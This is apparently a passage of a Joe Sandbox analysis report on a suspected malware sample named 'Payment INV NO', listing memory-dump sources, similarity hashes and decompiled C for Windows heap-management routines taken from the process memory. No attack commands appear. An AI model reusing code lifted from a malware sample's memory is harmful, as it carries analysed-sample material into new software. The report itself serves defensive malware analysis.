                                                          0x01807afc
                                                          0x01807afe
                                                          0x00000000
                                                          0x00000000
                                                          0x01807b00
                                                          0x01807b03
                                                          0x00000000
                                                          0x00000000
                                                          0x01807b05
                                                          0x01807b09
                                                          0x01807b0d
                                                          0x01807b0f
                                                          0x00000000
                                                          0x00000000
                                                          0x01807b18
                                                          0x01807b1d
                                                          0x00000000
                                                          0x01807b1d
                                                          0x01807ab7
                                                          0x01807ab9
                                                          0x00000000
                                                          0x00000000
                                                          0x01807abf
                                                          0x01807ac1
                                                          0x00000000
                                                          0x00000000
                                                          0x01807ac3
                                                          0x01807ac6
                                                          0x00000000
                                                          0x00000000
                                                          0x01807ac8
                                                          0x01807acc
                                                          0x01807ad0
                                                          0x01807ad2
                                                          0x00000000
                                                          0x00000000
                                                          0x01807adb
                                                          0x00000000
                                                          0x01807adb
                                                          0x018079d6
                                                          0x018079d9
                                                          0x018079dc
                                                          0x01807a91
                                                          0x01807a94
                                                          0x00000000
                                                          0x01807a94
                                                          0x018079e2
                                                          0x00000000
                                                          0x018079e2
                                                          0x01807a74
                                                          0x01807a7a
                                                          0x00000000
                                                          0x00000000
                                                          0x01807a8a
                                                          0x01807a21
                                                          0x01807a21
                                                          0x00000000
                                                          0x01807a21
                                                          0x0179c650
                                                          0x0179c651
                                                          0x0179c656
                                                          0x0179c65c
                                                          0x0179c65d
                                                          0x0179c663
                                                          0x0179c664
                                                          0x0179c66a
                                                          0x0179c66e
                                                          0x018079c5
                                                          0x018079c7
                                                          0x00000000
                                                          0x018079c7
                                                          0x0179c67a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1973cf50202ac196a3a269873d55304f922e942ab10117400c6e3318e170e81a
                                                          • Instruction ID: 80242f8df0861649d3e7940a77fbddc86251cced979ac915257d87d3fb65f7e8
                                                          • Opcode Fuzzy Hash: 1973cf50202ac196a3a269873d55304f922e942ab10117400c6e3318e170e81a
                                                          • Instruction Fuzzy Hash: 0181B27560460E8BDB67CE58CC90B6AB7A4FB84354F14485AEE85CB281D330FE41CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017C138B Relevance: .2, Instructions: 206COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 85%
                                                          			E017C138B(signed int __ecx, signed int* __edx, intOrPtr _a4, signed int _a12, signed int _a16, char _a20, intOrPtr _a24) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				signed int _t97;
				signed int _t102;
				void* _t105;
				char* _t112;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				signed int* _t122;
				signed int _t124;
				signed int _t130;
				signed int _t136;
				char _t150;
				intOrPtr _t153;
				signed int _t161;
				signed int _t163;
				signed int _t170;
				signed int _t175;
				signed int _t176;
				signed int _t182;
				signed int* _t183;
				signed int* _t184;

				_t182 = __ecx;
				_t153 = _a24;
				_t183 = __edx;
				_v24 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
				_t97 = _t153 - _a16;
				if(_t97 > 0xfffff000) {
					L19:
					return 0;
				}
				asm("cdq");
				_t150 = _a20;
				_v16 = _t97 / 0x1000;
				_t102 = _a4 + 0x00000007 & 0xfffffff8;
				_t170 = _t102 + __edx;
				_v20 = _t102 >> 0x00000003 & 0x0000ffff;
				_t105 = _t170 + 0x28;
				_v12 = _t170;
				if(_t105 >= _t150) {
					if(_t105 >= _t153) {
						goto L19;
					}
					_v8 = _t170 - _t150 + 8;
					_push(E017C0678(__ecx, 1));
					_push(0x1000);
					_push( &_v8);
					_push(0);
					_push( &_a20);
					_push(0xffffffff);
					if(E017D9660() < 0) {
						 *((intOrPtr*)(_t182 + 0x214)) =  *((intOrPtr*)(_t182 + 0x214)) + 1;
						goto L19;
					}
					if(E017B7D50() == 0) {
						_t112 = 0x7ffe0380;
					} else {
						_t112 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t112 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						L0185138A(_t150, _t182, _a20, _v8, 3);
					}
					_t150 = _a20 + _v8;
					_t153 = _a24;
					_a20 = _t150;
				}
				_t183[0] = 1;
				_t113 = _t153 - _t150;
				_t183[1] = 1;
				asm("cdq");
				_t175 = _t113 % 0x1000;
				_v28 = _t113 / 0x1000;
				 *_t183 = _v20;
				_t183[1] =  *(_t182 + 0x54);
				if((_v24 & 0x00001000) != 0) {
					_t117 = E017C16C7(1, _t175);
					_t150 = _a20;
					_t183[0xd] = _t117;
				}
				_t183[0xb] = _t183[0xb] & 0x00000000;
				_t176 = _v12;
				_t183[3] = _a12;
				_t119 = _a16;
				_t183[7] = _t119;
				_t161 = _v16 << 0xc;
				_t183[6] = _t182;
				_t183[0xa] = _t119 + _t161;
				_t183[8] = _v16;
				_t122 =  &(_t183[0xe]);
				_t183[2] = 0xffeeffee;
				_t183[9] = _t176;
				 *((intOrPtr*)(_t182 + 0x1e8)) =  *((intOrPtr*)(_t182 + 0x1e8)) + _t161;
				 *((intOrPtr*)(_t182 + 0x1e4)) =  *((intOrPtr*)(_t182 + 0x1e4)) + _t161;
				_t122[1] = _t122;
				 *_t122 = _t122;
				if(_t183[6] != _t183) {
					_t124 = 1;
				} else {
					_t124 = 0;
				}
				_t183[1] = _t124;
				 *(_t176 + 4) =  *_t183 ^  *(_t182 + 0x54);
				if(_t183[6] != _t183) {
					_t130 = (_t176 - _t183 >> 0x10) + 1;
					_v24 = _t130;
					if(_t130 >= 0xfe) {
						_push(_t161);
						_push(0);
						L0185A80D(_t183[6], 3, _t176, _t183);
						_t150 = _a20;
						_t176 = _v12;
						_t130 = _v24;
					}
				} else {
					_t130 = 0;
				}
				 *(_t176 + 6) = _t130;
				E017BB73D(_t182, _t183, _t150 - 0x18, _v28 << 0xc, _t176,  &_v8);
				if( *((intOrPtr*)(_t182 + 0x4c)) != 0) {
					_t183[0] = _t183[0] ^  *_t183 ^ _t183[0];
					 *_t183 =  *_t183 ^  *(_t182 + 0x50);
				}
				if(_v8 != 0) {
					E017BA830(_t182, _v12, _v8);
				}
				_t136 = _t182 + 0xa4;
				_t184 =  &(_t183[4]);
				_t163 =  *(_t136 + 4);
				if( *_t163 != _t136) {
					_push(_t163);
					_push( *_t163);
					L0185A80D(0, 0xd, _t136, 0);
				} else {
					 *_t184 = _t136;
					_t184[1] = _t163;
					 *_t163 = _t184;
					 *(_t136 + 4) = _t184;
				}
				 *((intOrPtr*)(_t182 + 0x1f4)) =  *((intOrPtr*)(_t182 + 0x1f4)) + 1;
				return 1;
			}































                                                          0x017c139f
                                                          0x017c13a1
                                                          0x017c13a4
                                                          0x017c13a6
                                                          0x017c13ab
                                                          0x017c13b3
                                                          0x01805522
                                                          0x00000000
                                                          0x01805522
                                                          0x017c13b9
                                                          0x017c13c1
                                                          0x017c13c4
                                                          0x017c13cd
                                                          0x017c13d0
                                                          0x017c13d9
                                                          0x017c13dc
                                                          0x017c13df
                                                          0x017c13e4
                                                          0x0180552b
                                                          0x00000000
                                                          0x00000000
                                                          0x01805534
                                                          0x0180553f
                                                          0x01805545
                                                          0x01805549
                                                          0x0180554a
                                                          0x0180554f
                                                          0x01805550
                                                          0x01805559
                                                          0x0180551c
                                                          0x00000000
                                                          0x0180551c
                                                          0x01805562
                                                          0x01805574
                                                          0x01805564
                                                          0x0180556d
                                                          0x0180556d
                                                          0x0180557c
                                                          0x01805597
                                                          0x01805597
                                                          0x0180559f
                                                          0x018055a2
                                                          0x018055a5
                                                          0x018055a5
                                                          0x017c13ec
                                                          0x017c13f2
                                                          0x017c13f4
                                                          0x017c13f8
                                                          0x017c13fe
                                                          0x017c1400
                                                          0x017c1406
                                                          0x017c1412
                                                          0x017c1419
                                                          0x018055b0
                                                          0x018055b5
                                                          0x018055b8
                                                          0x018055b8
                                                          0x017c1425
                                                          0x017c1429
                                                          0x017c142c
                                                          0x017c142f
                                                          0x017c1432
                                                          0x017c1435
                                                          0x017c143a
                                                          0x017c143d
                                                          0x017c1443
                                                          0x017c1446
                                                          0x017c1449
                                                          0x017c1450
                                                          0x017c1453
                                                          0x017c1459
                                                          0x017c145f
                                                          0x017c1462
                                                          0x017c1467
                                                          0x017c14fa
                                                          0x017c146d
                                                          0x017c146d
                                                          0x017c146d
                                                          0x017c146f
                                                          0x017c1479
                                                          0x017c1480
                                                          0x017c1507
                                                          0x017c1508
                                                          0x017c1510
                                                          0x018055c1
                                                          0x018055c2
                                                          0x018055cc
                                                          0x018055d1
                                                          0x018055d4
                                                          0x018055d7
                                                          0x018055d7
                                                          0x017c1482
                                                          0x017c1482
                                                          0x017c1482
                                                          0x017c1484
                                                          0x017c149b
                                                          0x017c14a4
                                                          0x017c14ae
                                                          0x017c14b4
                                                          0x017c14b4
                                                          0x017c14ba
                                                          0x017c14c4
                                                          0x017c14c4
                                                          0x017c14c9
                                                          0x017c14cf
                                                          0x017c14d2
                                                          0x017c14d7
                                                          0x018055df
                                                          0x018055e0
                                                          0x018055ea
                                                          0x017c14dd
                                                          0x017c14dd
                                                          0x017c14df
                                                          0x017c14e2
                                                          0x017c14e4
                                                          0x017c14e4
                                                          0x017c14e7
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ccb77aacd92171c0e91ed3ff3e412e4768b13fc683464a3ad31bdd7b65ac3901
                                                          • Instruction ID: bd9853f2da6f36e19a9ebad426fdd1bcd9e92d4823dd6871dec263ea817ba8b6
                                                          • Opcode Fuzzy Hash: ccb77aacd92171c0e91ed3ff3e412e4768b13fc683464a3ad31bdd7b65ac3901
                                                          • Instruction Fuzzy Hash: 98816B75A00649DFDB25CF68C884BAAFBF5EF48700F14856DE956C7692D330EA41CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017B97ED Relevance: .2, Instructions: 202COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E017B97ED(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr _v32;
				void* __ebx;
				void* __edi;
				unsigned int* _t72;
				signed int _t77;
				intOrPtr* _t80;
				char* _t81;
				signed int _t91;
				signed int _t101;
				char* _t108;
				signed int _t112;
				char* _t118;
				intOrPtr* _t130;
				intOrPtr _t153;
				unsigned int _t162;
				signed int _t164;
				intOrPtr _t166;
				signed int _t167;
				void* _t170;

				_t133 = __ecx;
				_t130 = __edx;
				_t153 = __ecx;
				_v24 = __ecx;
				_t2 = _t153 - 0xa8; // -168
				_t166 =  *((intOrPtr*)(__ecx + 0xc));
				_v20 =  *__edx;
				_t162 = _t2 + (( *(__edx + 8) & 0x000000ff) << 5);
				if( *((intOrPtr*)(_t166 + 0xd8)) != 0) {
					if(( *(_t166 + 0x40) & 0x00000001) == 0) {
						E017AEEF0( *((intOrPtr*)(_t166 + 0xc8)));
						E017AEB70(_t133,  *((intOrPtr*)(_t166 + 0xc8)));
						_t153 = _v32;
					}
				}
				_t167 =  *(_t162 + 4) & 0x0000ffff;
				_v12 = _t167;
				if(_t167 >  *((intOrPtr*)(_t162 + 0xc))) {
					_t20 = _t162 + 8; // -160
					_t72 = _t20;
					_v8 = _t72;
					if(_t167 <=  *_t72 >>  *(_t162 + 0x10)) {
						goto L2;
					}
					_t101 = 1 <<  *(_t130 + 8);
					if(1 > 0x78000) {
						_t101 = 0x78000;
					}
					_v16 = ( *(_t130 + 0xa) & 0x0000ffff) + _t101;
					E017BC111( *((intOrPtr*)(_v24 + 0xc)), _t130, ( *(_t130 + 0xa) & 0x0000ffff) + _t101);
					if(E017B7D50() != 0) {
						_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					} else {
						_t108 = 0x7ffe0380;
					}
					if( *_t108 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000001) == 0) {
							goto L13;
						} else {
							_t132 = _v24;
							L01851951(_v24,  *((intOrPtr*)(_v24 + 0xc)), _t130, _v16, ( *(_v20 + 0x14) & 0x0000ffff) << 3);
							goto L14;
						}
					} else {
						L13:
						_t132 = _v24;
						L14:
						_t31 = _t162 + 8; // -160
						_t91 = _t31;
						asm("lock dec dword [eax]");
						if(_v12 != 0) {
							_t91 = E017C1710(_t162);
							_t164 = _t91;
							if(_t164 != 0) {
								_t112 = 1 <<  *(_t164 + 8);
								if(1 > 0x78000) {
									_t112 = 0x78000;
								}
								_t175 = ( *(_t164 + 0xa) & 0x0000ffff) + _t112;
								asm("lock xadd [eax], ecx");
								E017BC111( *((intOrPtr*)(_t132 + 0xc)), _t164,  ~(( *(_t164 + 0xa) & 0x0000ffff) + _t112));
								if(E017B7D50() != 0) {
									_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t118 = 0x7ffe0380;
								}
								if( *_t118 != 0) {
									if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
										L018518CA(_t132,  *((intOrPtr*)(_t132 + 0xc)), _t164, _t175, 0);
										L01851951(_t132,  *((intOrPtr*)(_t132 + 0xc)), _t164, _t175, 0);
									}
								}
								_t91 = _v8;
								asm("lock dec dword [eax]");
							}
						}
						L7:
						return _t91;
					}
				}
				L2:
				_t77 = 1 <<  *(_t130 + 8);
				if(1 > 0x78000) {
					_t77 = 0x78000;
				}
				_t170 = ( *(_t130 + 0xa) & 0x0000ffff) + _t77;
				asm("lock xadd [eax], ecx");
				_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t80 != 0) {
					if( *_t80 == 0) {
						goto L4;
					}
					_t81 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					goto L5;
				} else {
					L4:
					_t81 = 0x7ffe0380;
					L5:
					if( *_t81 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							L018519D8(_t130,  *((intOrPtr*)(_v24 + 0xc)), _t130, _t170, ( *(_v20 + 0x14) & 0x0000ffff) << 3);
						}
					}
					E017B2280(_t162 >> 0x00000002 & 0x0000001f, 0x1886dc0 + (_t162 >> 0x00000002 & 0x0000001f) * 4);
					 *_t130 =  *_t162;
					 *(_t162 + 4) =  *(_t162 + 4) + 1;
					 *_t162 = _t130;
					E017AFFB0(_t130, _t162, 0x1886dc0 + (_t162 >> 0x00000002 & 0x0000001f) * 4);
					_t91 = ( *(_t162 + 0x16) & 0x0000ffff) + 1;
					 *(_t162 + 0x16) = _t91;
					goto L7;
				}
			}




























                                                          0x017b97ed
                                                          0x017b97f9
                                                          0x017b97fb
                                                          0x017b97ff
                                                          0x017b9805
                                                          0x017b980b
                                                          0x017b980e
                                                          0x017b9819
                                                          0x017b9824
                                                          0x017b9996
                                                          0x017b99a2
                                                          0x017b99ad
                                                          0x017b99b2
                                                          0x017b99b2
                                                          0x017b9996
                                                          0x017b982a
                                                          0x017b9831
                                                          0x017b9837
                                                          0x017b98b6
                                                          0x017b98b6
                                                          0x017b98b9
                                                          0x017b98c6
                                                          0x00000000
                                                          0x00000000
                                                          0x017b98d7
                                                          0x017b98db
                                                          0x01801366
                                                          0x01801366
                                                          0x017b98ed
                                                          0x017b98fd
                                                          0x017b9909
                                                          0x01801376
                                                          0x017b990f
                                                          0x017b990f
                                                          0x017b990f
                                                          0x017b9917
                                                          0x0180138d
                                                          0x00000000
                                                          0x01801393
                                                          0x01801399
                                                          0x018013af
                                                          0x00000000
                                                          0x018013af
                                                          0x017b991d
                                                          0x017b991d
                                                          0x017b991d
                                                          0x017b9921
                                                          0x017b9921
                                                          0x017b9921
                                                          0x017b9924
                                                          0x017b992c
                                                          0x017b9934
                                                          0x017b9939
                                                          0x017b993d
                                                          0x017b9949
                                                          0x017b994d
                                                          0x017b99bb
                                                          0x017b99bb
                                                          0x017b9953
                                                          0x017b995c
                                                          0x017b9966
                                                          0x017b9972
                                                          0x018013c2
                                                          0x017b9978
                                                          0x017b9978
                                                          0x017b9978
                                                          0x017b9980
                                                          0x018013d9
                                                          0x018013e7
                                                          0x018013f4
                                                          0x018013f4
                                                          0x018013d9
                                                          0x017b9986
                                                          0x017b998a
                                                          0x017b998a
                                                          0x017b993d
                                                          0x017b98ad
                                                          0x017b98b3
                                                          0x017b98b3
                                                          0x017b9917
                                                          0x017b9839
                                                          0x017b9844
                                                          0x017b9848
                                                          0x018013fe
                                                          0x018013fe
                                                          0x017b9852
                                                          0x017b9859
                                                          0x017b9863
                                                          0x017b9868
                                                          0x01801408
                                                          0x00000000
                                                          0x00000000
                                                          0x01801417
                                                          0x00000000
                                                          0x017b986e
                                                          0x017b986e
                                                          0x017b986e
                                                          0x017b9873
                                                          0x017b9876
                                                          0x0180142e
                                                          0x0180144d
                                                          0x0180144d
                                                          0x0180142e
                                                          0x017b988c
                                                          0x017b9893
                                                          0x017b9895
                                                          0x017b989a
                                                          0x017b989c
                                                          0x017b98a8
                                                          0x017b98a9
                                                          0x00000000
                                                          0x017b98a9

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d7eab7ed46d3d4d092d3c1008116fcfb600620de6d6d58c017d381e0212d1ff4
                                                          • Instruction ID: bb30da44e67c47ddf57201fec347e13425904389372d346006167b9ac2dccb70
                                                          • Opcode Fuzzy Hash: d7eab7ed46d3d4d092d3c1008116fcfb600620de6d6d58c017d381e0212d1ff4
                                                          • Instruction Fuzzy Hash: 4A7103B1604652CFC352DF28C884BAAF7E4FF84714F0585A9EAA9CB352D734D941CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017AF370 Relevance: .2, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 87%
                                                          			E017AF370(intOrPtr __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				unsigned int _v24;
				unsigned int _v28;
				void* __ebx;
				void* __edi;
				unsigned int _t65;
				signed int _t75;
				signed int _t76;
				intOrPtr* _t101;
				char* _t102;
				unsigned int _t115;
				signed int _t119;
				unsigned int _t124;
				void* _t134;
				signed int _t135;
				unsigned int _t137;
				signed int _t141;
				signed int _t148;
				void* _t152;
				intOrPtr* _t155;
				intOrPtr* _t156;
				unsigned int _t159;

				_v12 = __ecx;
				_v5 = __edx;
				_t65 = ((__edx & 0x000000ff) << 5) + __ecx;
				_t115 = _t65 - 0xa8;
				_v28 = _t65;
				_v24 = _t115;
				 *(_t115 + 0x14) = ( *(_t115 + 0x14) & 0x0000ffff) + 1;
				_v16 = 0x1886dc0 + (_t115 >> 0x00000002 & 0x0000001f) * 4;
				E017B2280(_t115 >> 0x00000002 & 0x0000001f, 0x1886dc0 + (_t115 >> 0x00000002 & 0x0000001f) * 4);
				_t155 =  *_t115;
				if(_t155 != 0) {
					 *_t115 =  *_t155;
					 *((intOrPtr*)(_t115 + 4)) =  *((intOrPtr*)(_t115 + 4)) + 0xffff;
				}
				asm("lock cmpxchg [edi], ecx");
				_t119 = 1;
				if(1 != 1) {
					while(1) {
						_t75 = _t119 & 0x00000006;
						_v20 = _t75;
						_t76 = _t119;
						_t134 = (0 | _t75 == 0x00000002) * 4 - 1 + _t119;
						asm("lock cmpxchg [ebx], edi");
